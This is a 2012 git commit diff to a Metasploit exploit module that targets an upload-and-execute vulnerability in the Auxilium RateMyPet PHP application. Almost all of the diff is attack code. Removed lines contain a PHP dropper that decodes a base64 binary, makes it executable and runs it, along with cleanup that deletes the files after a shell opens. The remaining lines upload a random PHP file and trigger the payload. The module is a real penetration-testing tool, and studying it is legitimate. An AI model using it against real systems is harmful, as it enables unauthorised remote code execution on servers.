Add PhpEXE support to RateMyPet module

2012-10-12 04:53:01 -05:00 · 2012-10-12 04:53:01 -05:00 · 90ae5c1178
parent db12413b09
commit 90ae5c1178
1 changed files with 6 additions and 54 deletions
--- a/modules/exploits/multi/http/auxilium_upload_exec.rb
+++ b/modules/exploits/multi/http/auxilium_upload_exec.rb
@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = ExcellentRanking

 	include Msf::Exploit::Remote::HttpClient
-	include Msf::Exploit::EXE
+	include Msf::Exploit::PhpEXE

 	def initialize(info={})
 		super(update_info(info,
@ -25,8 +25,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'DaOne',  #Vulnerability discovery
-					'sinn3r'  #Metasploit
+					'DaOne',  # Vulnerability discovery
+					'sinn3r'  # Metasploit
 				],
 			'References'     =>
 				[
@ -37,15 +37,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'BadChars' => "\x00"
 				},
-			'DefaultOptions'  =>
-				{
-					'ExitFunction' => "none"
-				},
 			'Platform'       => ['linux', 'php'],
 			'Targets'        =>
 				[
-				[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
-				[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
+					[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
+					[ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
 				],
 			'Privileged'     => false,
 			'DisclosureDate' => "Sep 14 2012",
@ -71,41 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote
 	end


-	def get_write_exec_payload(fname, data)
-		p = Rex::Text.encode_base64(generate_payload_exe)
-		php = %Q|
-		<?php
-		$f = fopen("#{fname}", "wb");
-		fwrite($f, base64_decode("#{p}"));
-		fclose($f);
-		exec("chmod 777 #{fname}");
-		exec("#{fname}");
-		?>
-		|
-		php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
-		return php
-	end
-
-
-	def on_new_session(cli)
-		if cli.type == "meterpreter"
-			cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
-		end
-
-		@clean_files.each do |f|
-			print_status("#{@peer} - Removing: #{f}")
-			begin
-				if cli.type == 'meterpreter'
-					cli.fs.file.rm(f)
-				else
-					cli.shell_command_token("rm #{f}")
-				end
-			rescue ::Exception => e
-				print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
-			end
-		end
-	end
-

 	def upload_exec(base, php_fname, p)
 		data = Rex::MIME::Message.new
@ -148,17 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		base = File.dirname("#{target_uri.path}.")

 		php_fname =  "#{Rex::Text.rand_text_alpha(5)}.php"
-		@clean_files = [php_fname]

-		case target['Platform']
-		when 'php'
-			p = "<?php #{payload.encoded} ?>"
-		when 'linux'
-			bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
-			@clean_files << bin_name
-			bin = generate_payload_exe
-			p = get_write_exec_payload("/tmp/#{bin_name}", bin)
-		end
+		p = get_write_exec_payload(:unlink_self=>true)

 		upload_exec(base, php_fname, p)
 	end